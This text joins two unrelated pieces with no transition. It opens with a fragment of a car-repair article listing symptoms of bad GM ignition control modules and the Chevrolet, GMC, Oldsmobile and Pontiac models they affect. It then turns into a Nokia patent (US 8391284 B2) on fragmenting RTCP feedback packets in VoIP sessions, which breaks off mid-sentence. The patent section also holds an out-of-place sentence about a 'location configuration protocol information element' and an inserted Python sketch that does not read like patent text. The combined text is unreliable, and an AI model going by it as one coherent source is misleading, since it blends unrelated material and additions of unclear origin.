The tests that you're gonna' learn in this article only deal with steps 1 thru' 4, among several tests. But whether your car or truck DOES NOT START or STARTS but runs with a MISFIRE, this is the article for you! Symptoms Of A Bad Ignition Control Module The following are usually the most common symptoms of a bad ignition control module on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) will Crank but NO START. 2. No spark coming from any of the spark plug wires. 3. The Throttle Body Fuel Injectors do not spray gasoline. The following are usually the most common symptoms of a bad spark plug wires, or a bad distributor cap and rotor on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) STARTS and RUNS, but with a misfire. 2. The check engine light is on. 3. Lack of power. 4. Rough idle. 5. Bad gas mileage. 6. Rotten egg smell coming out of the tailpipe. 7. Black smoke coming out of the tailpipe. 8. Won't pass the mandatory state emissions' test. The following is usually the most common (and only) symptom of a bad ignition coil on this type of GM distributor mounted ignition control module: 1. The car (or truck, or mini-van, or van) CRANKS but does NOT START. Chevrolet Vehicles: • Astro 4.3L • 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Blazer 4.3L, 5.0L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Silverado C1500, C2500, C3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 Chevrolet Vehicles: • Suburban C1500, C2500, C3500 5.7L, 7.4L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Camaro 2.8L, 3.1L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992 • Caprice Classic 4.3L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993 Chevrolet Vehicles: • Cavalier 2.0L, 2.8L • 1985, 1986 • Celebrity 2.0L, 2.8L • 1985, 1986 • El Camino 4.3L, 5.0L • 1985, 1986, 1987 • G10 G20 G30 Van 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • Sierra, Suburban C1500, C2500, C3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • G1500, G2500, G3500 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • Jimmy 4.3L, 5.0L, 5.7L • 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • K1500, K2500, K3500 4.3L, 5.0L, 5.7L • 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 • S15 Jimmy 4.3L • 1988, 1989, 1990, 1991 • Safari 4.3L • 1986, 1987, 1988, 1989, 1990, 1991, 1992, 1993, 1994, 1995 GMC Vehicles: • Sonoma 4.3L • 1991, 1992, 1993, 1994, 1995 • Yukon 5.7L • 1992, 1993, 1994, 1995 Oldsmobile Vehicles: • Bravada 4.3L • 1991, 1992, 1993, 1994, 1995 • Custom Cruiser 5.0L, 5.7L • 1991, 1992 Pontiac Vehicles: • Firebird 2.8L, 3.1L, 5.0L, 5.7L • 1985, 1986, 1987, 1988, 1989, 1990, 1991, 1992 • Grand Prix 4.3L, 5.0L • 1986, 1987
Usage of feedback information for multimedia sessions — US 8391284 B2

Publication number: US8391284 B2
Publication type: Grant
Application number: US 12/597,223
PCT number: PCT/IB2008/000988
Publication date: 5 Mar 2013
Filing date: 22 Apr 2008
Priority date: 23 Apr 2007
Fee status: Paid
Also published as: US20100135290, WO2008129408A2, WO2008129408A3
Inventors: Igor Danilo Diego Curcio
Original Assignee: Nokia Corporation

Abstract

An apparatus and method configure RTCP packets in control feedback handling in multimedia sessions. The apparatus and method are configured to provide sending of any individual RTCP packet as a non-compound RTCP packet in an order within a time interval. The apparatus and method are configured so that an excessive length of compound RTCP packets is handled by fragmenting each compound RTCP packet into smaller non-compound packets and sending them spaced over time. The apparatus and method guarantee that RTCP non-compound packets provide an equivalent functionality to the RTCP compound packets by providing the same information to the receiver, so the receiver does not lack any feedback information. The apparatus and method are also configured to use semi-compound RTCP packets, where at least two non-compound/individual RTCP packets (but less than all the non-compound/individual RTCP packets that would be sent as a compound packet) are sent together as a semi-compound RTCP packet.

Claims(20)

1. An apparatus, comprising: a controller configured to fragment a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets and to define one of the non-compound real-time transport control protocol packets as comprising at least one of a sender report, a receiver report and a session description protocol security description for media streams; and a transmitter configured to transmit the at least one non-compound real-time transport control protocol packet in a sample order within a defined interval.

2. The apparatus of claim 1, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet.

3. The apparatus of claim 1, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet.

4.
The apparatus of claim 1, wherein the controller is further configured to define a second packet as a real-time transport protocol packet; and wherein the transmitter is further configured to transmit the real-time transport protocol packet. 5. The apparatus of claim 4, wherein the real-time transport protocol packet is encapsulated in Internet protocol packet; and wherein the internet protocol packet comprises a plurality of real-time transport protocol packets. 6. The apparatus of claim 4, wherein the transmitter is further configured to transmit the non-compound real-time transport control protocol packet and the real-time transport protocol packet within a same packet data protocol context and radio bearer. 7. The apparatus of claim 4, wherein the real-time transport protocol packet comprises a fixed real-time transport protocol header, a list of contribution sources, and payload data, wherein the list of contributing sources can be empty. 8. The apparatus of claim 1, wherein the non-compound real-time transport control protocol packet is encapsulated in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of non-compound real-time transport control protocol packets, as a compound real-time transport control protocol packet. 9. A method, comprising: fragmenting a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets; defining one of the plurality of the non-compound real-time transport control protocol packets to comprise at least one of a sender report, a receiver report and a session description protocol security description for media streams; and transmitting the non-compound real-time transport control protocol packets in a sample order within a defined time interval. 10. The method of claim 9, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 11. The method of claim 9, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet. 12. The method of claim 9, further comprising: generating a real-time transport protocol packet; and transmitting the real-time transport protocol packet. 13. The method of claim 12, wherein the real-time transport protocol packet is encapsulated in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of real-time transport protocol packets. 14. The method of claim 12, wherein the transmitting further comprises transmitting the non-compound real-time transport control protocol packet and the real-time transport protocol packet within a same packet data protocol context and radio bearer. 15. The method of claim 12, wherein the real-time transport protocol packet comprises a fixed real-time transport protocol header, a list of contribution sources, and payload data, wherein the list of contributing sources is capable of being empty. 16. 
The method of claim 9, further comprising encapsulating the non-compound real-time transport control protocol packet in an internet protocol packet; and wherein the internet protocol packet comprises a plurality of non-compound real-time transport control protocol packets, as a compound real-time transport control protocol packet. 17. A non-transitory computer-readable medium that contains a computer program, the computer program is executed by a processor to implement a method, the method comprising: fragmenting a compound real-time transport control protocol packet into a plurality of non-compound real-time transport control protocol packets; defining one of the plurality of the non-compound real-time transport control protocol packets to comprise at least one of a sender report, a receiver report and a session description protocol security description for media streams; and transmitting the non-compound transport control protocol packet in a sample order within a defined time interval. 18. The non-transitory computer-readable medium of claim 17, wherein at least one of the non-compound real-time transport control protocol packets further comprises at least one of an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 19. The non-transitory computer-readable medium of claim 17, wherein the defined time interval comprises a round trip time, a cyclic order, or a real-time transport control protocol interval time; and wherein the sample order comprises a cyclic order, which comprises an application defined real-time transport control protocol non-compound packet with some adaptation information, a real-time transport control protocol sender report packet, and a security description for media streams packet. 20. The non-transitory computer-readable medium of claim 17, wherein the method further comprising: generating a second packet as a real-time transport protocol packet; and transmitting the real-time transport protocol packet. Description RELATED APPLICATION This application was originally filed as PCT Application No. PCT/IB2008/000988 filed Apr. 22, 2008 which claims priority to U.S. Provisional Application No. 60/907,938 filed Apr. 23, 2007. CROSS REFERENCE TO RELATED APPLICATIONS This application claims priority of U.S. Provisional Patent Application Ser. No. 60/907,938, filed on Apr. 23, 2007. The subject matter of the earlier filed application is hereby incorporated by reference. BACKGROUND OF THE INVENTION 1. Field of the Invention The present invention relates to an apparatus and method to transmit voice and other multimedia information over a network. In particular, an apparatus and method are provided which configure real time transport control protocol packets in a control feedback handling in multimedia sessions. 2. Description of the Related Art Multimedia data is distributed by, for example, multimedia protocols. Real-time transport protocol (RTP) uses universal datagram protocol (UDP) as a transport protocol appropriate for transmission of streaming data; because UDP provides a fast transmission although not reliable like it is the case by transmission control protocol (TCP). Hypertext transport protocol (HTTP) and real-time streaming protocol (RTSP) run over the reliable TCP. The RTSP provides session control for streaming sessions. HTTP can be used for transmission of still images, bitmap graphics and text. 
The RTP can provide end-to-end network transport functions suitable for applications transmitting real-time data, such as audio, video or simulation data, over multicast or unicast network services. The functions provided by RTP include payload type identification, sequence numbering, timestamping, and delivery monitoring. The RTP contains a related RTP Control Protocol (RTCP) augmenting the data transport, which is used to monitor a quality of service (QoS) and to convey information about the participants in an ongoing session. Each media stream in a conference is transmitted as a separate RTP session with a separate RTCP stream. RTP adds a time stamp and a sequence number to each UDP packet in a special RTP header. The time stamp is related to the sampling or the presentation or composition time of the media carried in the payload of the RTP packet. It is used for playing back media at the correct speed, and together with RTCP, it can be used for synchronizing the presentation of other streaming media. A payload specification defines the interpretation of the time stamp and other RTP fields. The recipient can use the sequence number to detect the loss of packets statistics on loss can be reported to the server by means of RTCP. RTCP reports are capable of providing statistics about the data received from a particular source, such as the number of packets lost since the previous report, the cumulative number of packets lost, the interarrival jitter, etc. The RTCP control protocol is based on the periodic transmission of control packets to all participants in the session, using the same distribution mechanism as the data packets. The underlying protocol provides multiplexing of the data and control packets, for example using separate port numbers with UDP. An apparatus and method are needed in which an excessive length of compound RTCP packets may be handled by fragmenting each compound RTCP packet in smaller non-compound packets and sending it spaced over time. The apparatus and method would guarantee RTCP non-compound packets to provide an equivalent functionality as the RTCP compound packets by providing the same information to the receiver (SR, RR, SDES, etc.), and the receiver would not lack any feedback information. SUMMARY OF THE INVENTION Embodiments of the invention can provide an apparatus, which includes a controller configured to define a first packet as a non-compound real-time transport control protocol packet. The controller is further configured to define the non-compound real-time transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the non-compound real-time transport control protocol packet in a sample order within a defined interval. Furthermore, embodiments of the invention can provide a method, which includes configuring a first packet as a non-compound real-time transport control protocol packet. The method further includes configuring the non-compound real-time transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. 
The method further includes transmitting the non-compound real-time transport control protocol packet in a sample order within a defined time interval. Furthermore, embodiments of the invention can provide an apparatus, which includes a controller configured to define a real-time transport control protocol packet as either a compound real-time transport control protocol packet or a non-compound real-time transport control protocol packet. The controller is further configured to define a limit on a size of a real-time transport control protocol packet to be at most as large as N times a size of a speech packet size. The size of the speech packet size corresponds to a highest of speech codec modes used in a session. Furthermore, embodiments of the invention can provide a method, which includes defining a real-time transport control protocol packet as either a compound real-time transport control protocol or a non-compound real-time transport control protocol. The method further includes determining whether the speech packet size includes headers; if the speech packet size includes headers. The method further includes determining whether the headers are compressed. The method further includes defining a limit on the size of the real-time transport control protocol packet to be at most as large as N times the size of the speech packet size. The size of the speech packet size corresponds to a highest of the speech codec modes used in a session. Furthermore, embodiments of the invention can provide an apparatus, which includes a receiver configured to receive a non-compound real-time transport control protocol packet from a receiver terminal. The apparatus further includes a controller configured to insert information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to the receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a method, which includes receiving a non-compound real-time transport control protocol packet, at a sender terminal. The method further includes, upon reception of the first non-compound real-time transport control protocol packet, inserting information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. The method includes transmitting the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to a receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicative that the sender terminal has received the non-compound real-time transport control protocol packet. 
Furthermore, embodiments of the invention can provide an apparatus, which includes a determiner configured to determine that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allows the sending of a compound real-time transport control protocol packet. The apparatus further includes a controller configured to define a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The apparatus further includes a transmitter configured to transmit the semi-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a method, which includes determining that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allows the sending of a compound real-time transport control protocol packet. The method further includes configuring a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The method further includes transmitting the semi-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to control a processor to implement a method. The method includes configuring a first packet as a non-compound transport control protocol packet. The method further includes configuring the non-compound transport control protocol packet to comprise at least one of a sender report, a receiver report, a session description protocol security description for media streams, an application defined real-time transport control protocol packet, or an individual real-time transport control protocol packet. The method further includes transmitting the non-compound transport control protocol packet in a sample order within a defined time interval. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes defining a real-time transport control protocol packet as either a compound real-time transport control protocol or a non-compound real-time transport control protocol. The method further includes determining whether the speech packet size includes headers. The method further includes, if the speech packet size includes headers, determining whether the headers are compressed. The method further includes defining a limit on the size of the real-time transport control protocol packet to be at most as large as N times the size of the speech packet size. The size of the speech packet size corresponds to a highest of the speech codec modes used in a session. 
Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes receiving a non-compound real-time transport control protocol packet at a sender terminal. The method further includes, upon reception of the first non-compound real-time transport control protocol packet, inserting information in a real time transport protocol packet and/or the non-compound real-time transport control protocol packet. The information includes a positive acknowledgement indicating that the sender terminal has received the non-compound real-time transport control protocol packet. The method further includes transmitting the real time transport protocol packet and/or the non-compound real-time transport control protocol packet to a receiver terminal. The receiver terminal determines that the information comprises the positive acknowledgement indicating that the sender terminal has received the non-compound real-time transport control protocol packet. Furthermore, embodiments of the invention can provide a computer program embodied on a computer-readable medium, the computer program configured to implement a method. The method includes determining that a radio bearer allows the sending of more than one non-compound real-time transport control protocol packet, but does not allow the sending of a compound real-time transport control protocol packet. The method further includes configuring a real-time transport control protocol packet as a semi-compound real-time transport control protocol packet. The semi-compound real-time transport control protocol packet includes at least two non-compound real-time transport control protocol packets, but less than all the non-compound real-time transport control protocol packets that would be sent as a compound real-time transport control protocol packet. The method further includes transmitting the semi-compound real-time transport control protocol packet. BRIEF DESCRIPTION OF THE DRAWINGS Further embodiments, details, advantages and modifications of the present invention will become apparent from the following detailed description of the preferred embodiments which is to be taken in conjunction with the accompanying drawings, in which: FIG. 1 illustrates a graphical representation of a real time transport protocol (RTP) control protocol (RTCP) feedback. FIG. 2 illustrates an example of a conversation session between two terminals using VoIP. FIG. 3 illustrates the size differences between RTP and RTCP packets. FIG. 4 depicts an example embodiment of a terminal according to the present invention. FIG. 5 illustrates a flow diagram of an RTCP configuration, in accordance with a first embodiment of the present invention. FIG. 6 illustrates a flow diagram limiting a size of an RTCP packet, in accordance with a second embodiment of the present invention. FIG. 7 illustrates a method to verify the delivery of a non-compound RTCP packet from a receiver to a sender terminal, in accordance with a third embodiment of the present invention. FIG. 8 illustrates a method to process semi-compound RTCP packets, in accordance with a fourth embodiment of the present invention. DETAILED DESCRIPTION OF THE PREFERRED EMBODIMENTS One of the functions of RTCP is to provide feedback on the quality of the data distribution. This is a part of the RTP's role as a transport protocol and is related to the flow and congestion control functions of other transport protocols. 
The feedback may be directly useful to diagnose faults in the distribution. Sending reception feedback reports to all participants allows one who is observing problems to evaluate whether those problems are local or global. With a distribution mechanism like IP multicast, it is also possible for an entity such as a network service provider who is not involved in the session to receive the feedback information and act as a third-party monitor to diagnose network problems. This feedback function is performed by the RTCP sender and receiver reports. The RTCP specification requires that all participants send RTCP packets; therefore, the rate must be controlled in order for RTP to scale up to a large number of participants. By having each participant send its control packets to all the others, each can independently observe the number of participants. This number is used to calculate the rate at which the packets are sent. Several alternatives have been considered in past years in several 3GPP Working Groups to overcome a basic problem in VoIMS (voice over Internet protocol multimedia subsystem): the uncontrolled nature of the RTCP traffic and its possible impact on the RTP traffic, which carries voice data:
1. Removal of RTCP for VoIMS
2. RTP and RTCP carried over separate PDP contexts and radio bearers
3. RTP frame stealing (prioritizing RTCP over RTP)
In addition to the previous alternatives, other proposals have also been made in the past:
4. Segmentation and concatenation over the radio interface
5. RB/TrCH/PhyCH Reconfiguration
6. Allocation of secondary scrambling code
These methods are primarily for the downlink only (it is assumed that in uplink the bearer can be over-dimensioned). In general, the three above-mentioned radio access level solutions are specific to UTRAN (i.e., not applicable to GERAN, e.g., the usage of the secondary scrambling code), and/or they are not applicable in legacy networks (e.g., the reconfiguration). Recently, a proposal to use RTCP non-compound packets has been made in the Internet engineering task force (IETF) and the third generation partnership project (3GPP). The RTP protocol mandates the usage of compound RTCP packets. Compound RTCP packets are made of at least two individual RTCP packets that contain at least a Sender Report (SR) or Receiver Report (RR), and an SDES packet with the CNAME field. Some proposals suggest removing the constraint of sending compound RTCP packets and allowing non-compound RTCP packets to be sent, in order to reduce the size of RTCP packets over a mobile network link and to remove or decrease the side effects of large RTCP packets. FIG. 1 illustrates a graphical representation of the RTCP feedback possibilities within multimedia telephony service for IP multimedia subsystem (MTSI) speech-only sessions. Note that x % and y % sum to 100% of the feedback within a session. Reference will now be made in detail to preferred embodiments of the present invention, examples of which are illustrated in the accompanying drawings. In accordance with an embodiment of the present invention, there is provided an apparatus, a system, and a method to define a location configuration protocol information element within a network. Embodiments of the present invention relate to an apparatus and method to transmit voice and other multimedia information over a network. 
In particular, an apparatus and method can be provided for configuring real time transport control protocol packets in voice over Internet protocol (VoIP) control feedback handling in multimedia sessions. Embodiments of the present invention relate to an apparatus and method for configuring real time transport control protocol packets in control feedback handling in multimedia sessions. The apparatus and method can also be configured to provide sending of any real time transport control protocol individual packet as a non-compound real time transport control protocol packet in any order within a time interval. The apparatus and method can be further configured so that the excessive length of compound real time transport control protocol packets is handled by fragmenting each compound real time transport control protocol packet into smaller non-compound packets and sending them spaced over time. The apparatus and method can guarantee that real time transport control protocol non-compound packets provide functionality equivalent to real time transport control protocol compound packets by providing the same information to the receiver, so that the receiver does not lack any feedback information. Embodiments of the present invention relate to an apparatus and method to use semi-compound real time transport control protocol packets, where at least two non-compound/individual real time transport control protocol packets (but less than all the non-compound/individual real time transport control protocol packets that would be sent as a compound packet) are sent together as a semi-compound real time transport control protocol packet. The framework of an embodiment of the invention is a transmission system for real-time voice-related data over VoIP. In third generation partnership project IP multimedia subsystem (3GPP IMS) networks, this framework is referred to as VoIMS (voice over Internet protocol multimedia subsystem) or MTSI. Voice calls can be either point-to-point or conferencing calls. The present invention may also apply to point-to-multipoint voice connections and video telephony connections, where media other than voice may also be carried (for instance, video). FIG. 2 illustrates an example of a conversation session between two terminals 1, 2 using VoIP. In this non-limiting example, the terminals 1, 2 are communicating with each other via a wireless communication network 3 and the internet 4. The communication is based on packet transmission using a real-time transport protocol (RTP). The RTP packets are encapsulated in packets of a lower layer protocol, such as Internet Protocol (IP). A packet data protocol (PDP) context is created for the VoIP session. The wireless communication network reserves some network resources for the PDP context. These network resources are called radio bearers in third generation partnership project (3GPP) wireless communication systems. During the conversation, audio information such as speech is converted into digital form in the terminals 1, 2. The digital data is then encapsulated to form packets which can be transmitted via the networks to the terminal on the other side of the connection. That terminal receives the packets and performs steps to recover the audio information. In the following, it is assumed that the RTP and real-time control protocol (RTCP) traffic are carried in the same PDP context and radio bearer. 
The RTP can provide end-to-end delivery services for data with real-time characteristics, such as interactive audio and video. Those services include payload type identification, sequence numbering, time stamping and delivery monitoring. Applications can run RTP on top of UDP to make use of its multiplexing and checksum services; both protocols contribute parts of the transport protocol functionality. However, RTP may be used with other suitable underlying network or transport protocols. RTP supports data transfer to multiple destinations using multicast distribution if provided by the underlying network. The audio conferencing application used by each conference participant can send audio data in small chunks of, for example, 20 ms duration. Each chunk of audio data is preceded by an RTP header; RTP header and data are in turn contained in a UDP packet. The RTP header indicates what type of audio encoding (such as AMR, AMR-WB, PCM, ADPCM or LPC) is contained in each packet so that senders can change the encoding during a conference, for example, to accommodate a new participant that is connected through a low-bandwidth link or react to indications of network congestion. If both audio and video media are used in a conference, they can be transmitted as separate RTP sessions. That is, separate RTP and RTCP packets can be transmitted for each medium using two different UDP port pairs and/or multicast addresses. There is no direct coupling at the RTP level between the audio and video sessions, except that a user participating in both sessions should use the same distinguished (canonical) name in the RTCP packets for both so that the sessions can be associated. One motivation for this separation is to allow some participants in the conference to receive only one medium if they choose. Despite the separation, synchronized playback of a source's audio and video can be achieved using timing information carried in the RTCP packets for both sessions. An RTP packet is a data packet which includes the fixed RTP header, a possibly empty list of contributing sources, and the payload data. RTP payload is the data transported by RTP in a packet, for example audio samples or compressed video data. Some underlying protocols may require an encapsulation of the RTP packet to be defined. Typically one packet of the underlying protocol contains a single RTP packet, but several RTP packets may be contained if permitted by the encapsulation method. The RTP control protocol (RTCP) is based on the periodic transmission of control packets to all participants in the session, using the same distribution mechanism as the data packets. The underlying protocol should provide multiplexing of the data and control packets, for example using separate port numbers with UDP. RTCP can perform numerous functions, including: 1. Providing feedback on the quality of the data distribution. This is a part of the RTP's role as a transport protocol and is related to the flow and congestion control functions of other transport protocols. The feedback may be directly useful for control of adaptive encodings, but experiments with IP multicasting have shown that it is also critical to get feedback from the receivers to diagnose faults in the distribution. Sending reception feedback reports to all participants allows one who is observing problems to evaluate whether those problems are local or global. 
With a distribution mechanism like IP multicast, it is also possible for an entity such as a network service provider who is not otherwise involved in the session to receive the feedback information and act as a third-party monitor to diagnose network problems. This feedback function is performed by the RTCP sender and receiver reports. 2. RTCP carries a persistent transport-level identifier for an RTP source called the canonical name or CNAME. 3. The first two functions can require that all participants send RTCP packets, therefore the rate must be controlled in order for RTP to scale up to a large number of participants. By having each participant send its control packets to all the others, each can independently observe the number of participants. This number is used to calculate the rate at which the packets are sent. 4. A fourth, optional function is to convey minimal session control information, for example participant identification to be displayed in a user interface of a terminal. An RTCP packet is a control packet which includes a fixed header part similar to that of RTP data packets, followed by structured elements that vary depending upon the RTCP packet type. Typically, multiple RTCP packets are sent together as a compound RTCP packet in a single packet of the underlying protocol; this is enabled by the length field in the fixed header of each RTCP packet. The Internet, like other packet networks, occasionally loses and reorders packets and delays them by variable amounts of time. To cope with these impairments, the RTP header contains timing information and a sequence number that allow the receivers to reconstruct the timing produced by the source, so that, for example, chunks of audio are contiguously played out the speaker every 20 ms. This timing reconstruction is performed separately for each source of RTP packets in the conference. The sequence number can also be used by the receiver to estimate how many packets are being lost. FIG. 3 illustrates RTP and RTCP traffic inter-dependency in VoIMS. It is assumed that RTP and RTCP traffic are carried in the same PDP context and radio bearer. The basic problem in VoIMS is given by the uncontrolled nature of the RTCP traffic, and its possible impact on the RTP traffic, which carries voice data. As illustrated in FIG. 3, RTP/UDP/IPv6 headers of the RTP packets are compressed using ROHC RTP/UDP/IP profile, and the UDP/IPv6 headers of the RTCP packets using ROHC UDP/IP profile. FIG. 3 shows that, the length of RTCP packets can be much larger than the length of RTP packets. Every RTP packet is sent during one 20 ms Transmission Time Interval (TTI). The transmission of one RTCP packet covers multiple transmission time intervals. Since the transmission of RTP and RTCP occurs on the same radio bearer, RTCP packets may cause RTP packets to be delayed or even lost (depending on the RLC discard timer). Ultimately, this produces impairment of the perceived speech quality. In the above described example it is assumed that the bearer is dimensioned for (maximum) 12.2 kbps AMR mode (RTP payload 32 bytes), so that there is room for ROHC First Order (FO) header and PDCP header, together maximum of 9 bytes. It is noted here that the maximum size of the FO header depends on the ROHC implementation. Also, occasional ROHC feedback headers may increase the size of the ROHC header. The dimensioning of the bearer may be somewhat higher or lower, depending on the assumed ROHC header size and depending on the allowed delay. 
The example presented the case in UTRAN, with the usage of ROHC. The same conclusions can be drawn without the usage of ROHC. A similar situation holds also in GSM Edge Radio Access Network (GERAN) networks: instead of the TTI concept, there is a fixed number of time slots reserved for the transmission of the header compressed RTP packet once in 20 ms (e.g., one time slot in each of the consecutive 4 or 5 TDMA frames of 4.615 ms duration). FIG. 4 depicts an example embodiment of a terminal according to the present invention. The terminal 1 includes an audio-to-electric converter 1.1 such as a microphone, an electric-to-audio converter 1.2 such as a loudspeaker, and a codec 1.3 for performing encoding and decoding operations for audio. The terminal also includes a voice activity detector 1.4 which tries to determine whether there is speech going on or pauses in the speech (i.e., silence). The determination may be performed on the basis of the analog signals received from the audio-to-electric converter 1.1, or on the basis of digital speech information provided by the codec 1.3. In the latter case, the codec, which can be an adaptive multi-rate (AMR) codec or an adaptive multi-rate wideband (AMR-WB) codec, forms frames of the speech and attaches a frame type indication to the frame. Therefore, silence is detectable by the sending terminal by e.g. looking at the Frame Type field in the payload Table of Contents of the AMR or AMR-WB RTP streams. The terminal can also include a control block 1.5 to control the operations of the terminal 1. It is possible to send RTCP packets during the silence periods with no impact on the speech quality. During the silence periods, RTCP packets of normal size can be used. However, due to the unpredictability of the silence length, it is normally better to use short RTCP packets rather than long RTCP packets. This minimizes the impact of RTCP packet transmission on the RTP flow in case the RTCP packet is sent just before the silence period is over. This approach may produce delay/loss of silence descriptor (SID) packets, but this fact has no significant negative impact on the speech quality. In addition, the impact of lost/delayed SID packets is really minimal as the RTP packet rate during silence periods is much smaller than 50 packets per second, and many of the transmission time interval slots are freely usable for RTCP data. In an example of the present invention, the scheduling of RTCP packets can be modified, when necessary, in the following way. When the voice activity detector 1.4 determines that there is a pause (silence period) in the speech, the rescheduling is performed. For example, in the control block 1.5, if there is an RTCP packet waiting for transmission and the transmission of such a packet is scheduled to happen at a future time, then the transmission of that RTCP packet is initiated, i.e. the RTCP packet is sent substantially immediately (or at any point of time during the silence period) after the silence period is detected. In addition to that, in this non-limiting example, if there is another RTCP packet waiting for transmission, the next RTCP packet is re-scheduled with a time offset from the just sent RTCP packet. This procedure can also be expressed as pseudo code: If ((RTCP packet is scheduled at a future time) and (silence period occurs immediately)) then {RTCP packet is sent during the silence period; the next RTCP packet is re-scheduled with a time offset from the just sent RTCP packet}. 
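As an illustration only, the pseudo code above could be sketched in Python roughly as follows; the queue structure, the transmit callback and the 0.5 s offset are assumptions of the sketch, not values taken from the description.

    import time
    from dataclasses import dataclass
    from typing import Callable, List

    @dataclass
    class ScheduledRtcp:
        payload: bytes
        send_at: float  # absolute (monotonic) time at which the packet is due

    def on_silence_period_detected(queue: List[ScheduledRtcp],
                                   transmit: Callable[[bytes], None],
                                   offset_s: float = 0.5) -> None:
        # If an RTCP packet is scheduled for a future time when a silence period
        # begins, send it immediately and push the next queued packet out by a
        # time offset from the packet just sent.
        now = time.monotonic()
        if queue and queue[0].send_at > now:      # a packet is waiting for a future slot
            transmit(queue.pop(0).payload)        # send it during the silence period
            if queue:                             # re-schedule the next waiting packet
                queue[0].send_at = now + offset_s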
In accordance with a first embodiment of the present invention, when RTCP non-compound packets are used and the RTCP transmission interval for non-compound packets is too large, the non-compound packets may not be used at all, or used very rarely. If this is the case, the benefits of RTCP compound are almost null, but there is still the need to report important information to the sender (e.g., sender report (SR), receiver report (RR), session description protocol security descriptions for media streams (SDES), and application defined RTCP packet (APP) or other individual RTCP packets). Therefore, in order to guarantee the correct operation of RTCP, in accordance with an embodiment of the present invention, the apparatus and method of the present invention allow sending of any RTCP individual packet (not just APP packets for adaptation) as a non-compound RTCP packet in any possible order within a certain time interval (e.g., within a round trip time (RTT), or the RTCP transmission interval time). One possible example order is a cyclic order, in which an RTCP APP non-compound packet with some adaptation information is sent first, then an RTCP SR packet, and then an SDES packet. Other orders are possible. FIG. 5 illustrates a flow diagram of an RTCP configuration, in accordance with a first embodiment of the present invention. At step 500, the method configures the RTCP packet as a non-compound RTCP packet. At step 510, the method configures the non-compound RTCP packet with reporting or adaptation information, including but not limited to, an SR, an RR, an SDES, an application defined RTCP packet (APP), or other individual RTCP packets. At step 520, the method transmits the non-compound RTCP packet with the information in a predetermined order within a certain time interval. The predetermined order may be configured as any possible order. At step 530, the method transmits an RTCP SR packet; and, at step 540, the method transmits an SDES packet. Other orders are possible. In accordance with a second embodiment of the present invention, for multi-rate VoIMS sessions, that is, sessions where a speech codec can operate according to a certain number of modes (or bit-rates—for example an adaptive multi-rate (AMR) codec has eight modes corresponding to eight different bit rates), a bearer may be dimensioned to carry the highest of the modes. A one-to-one mapping between speech packets and data link layer frames can, therefore, be maintained. In order to maintain the same mapping for RTCP packets (or to limit the negative influence of the RTCP traffic on the RTP traffic), a limit on a size of RTCP packets can be established by the apparatus and method of the present invention. The limit may be defined so that the size of the 